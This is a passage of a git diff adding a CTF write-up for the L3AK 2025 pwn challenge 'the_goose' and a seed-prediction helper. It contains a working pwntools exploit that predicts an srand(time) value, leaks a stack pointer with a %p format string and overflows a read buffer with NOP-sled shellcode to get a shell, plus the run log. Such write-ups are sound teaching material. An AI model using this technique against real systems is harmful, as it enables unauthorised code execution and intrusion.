+  /* The message is written one char at a time I placed everything on the same line to make it readable */
+  success_message = "wow %s you\'re so go what message would you like to leave to the world?"
+  success_message[0x49] = '\0';
+  printf("what\'s your name again?");
+  scanf("%31s",name_buffer);
+  local_d9 = 0;
+  sprintf(buffer_random,success_message,name_buffer);
+  printf(buffer_random);
+  read(0,message_buffer,0x400);
+  printf("got it. bye now.");
+  return;
+}
+```
+
+The highscore function has a really obvious buffer overflow on the call to `read` that would allow us to inject shellcode and jump to it.  
+So there are two steps to this challenge :
+1. Guessing the number of honks
+2. Exploiting the `highscore` function to get a shell
+
+## Guessing the number of honks
+
+The random number generator is initialised using `srand(time(NULL))` which makes the seed the second of the call to `srand`.  
+We also know how the number of honks is calculated (`nhonks = iVar1 % 0x5b + 10;`).  
+From there we can easily compute the number with a small C program 
+```C
+#include <stdlib.h>
+#include <stdio.h>
+#include <time.h>
+
+int main(void)
+{
+	srand(time(NULL));
+	printf("%d", (rand() % 0x5b + 10));
+	return 0;
+}
+```
+
+After compiling we can call it from a pwntools script and correctly guess the number of honks (if you are on a slow link you can add 1 or 2 to the `srand` time).
+```python
+number = subprocess.run(["./predict"], capture_output=True).stdout
+io.sendlineafter(b"> ", b"GOD")
+io.sendlineafter(b'so GOD. how many honks?', number)
+```
+
+## Exploiting the highscore function
+
+Using the buffer overflow on the `read` call we can easily place a shellcode on the stack (there is no NX).  
+The only problem is finding the address of something on the stack to be able to jump to our shellcode.  
+This can be done using the format string vulnerability when we are asked for our name again. Giving `%p` as the name we are able to leak a pointer to the stack.  
+The last step is to calculate the offsets and finish writing the exploit scrip
+
+## Putting it all together
+
+```python
+io = start()
+
+number = subprocess.run(["./predict"], capture_output=True).stdout
+io.sendlineafter(b"> ", b"GOD")
+io.sendlineafter(b'so GOD. how many honks?', number)
+
+io.sendlineafter(b"what's your name again?", b'%p')
+
+stack = int(io.recv().decode().split()[1], 16)
+stack -= 0x126 # Offset to our buffer
+
+# Space before return pointer 376
+sh = asm(shellcraft.amd64.linux.sh())
+
+payload = flat(
+        asm('nop')*100,
+        sh,
+        b'A'*(376-100-len(sh)),
+        pack(stack)
+        )
+io.sendline(payload)
+
+io.interactive()
+```
+
+We run it and there we go
+```
+>>> ./exploit.py REMOTE 34.45.81.67 16004                                                                       <<<
+[+] Opening connection to 34.45.81.67 on port 16004: Done
+[*] Switching to interactive mode
+got it. bye now.$ cat /flag.txt
+L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}
+[*] Interrupted
+[*] Closed connection to 34.45.81.67 port 16004
+```
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c b/content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c
new file mode 100644
index 0000000..d01ca0e
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c
@@ -0,0 +1,10 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <time.h>
+
+int main(void)
+{
+	srand(time(NULL) + 1);
+	printf("%d", (rand() % 0x5b + 10));
+	return 0;
+}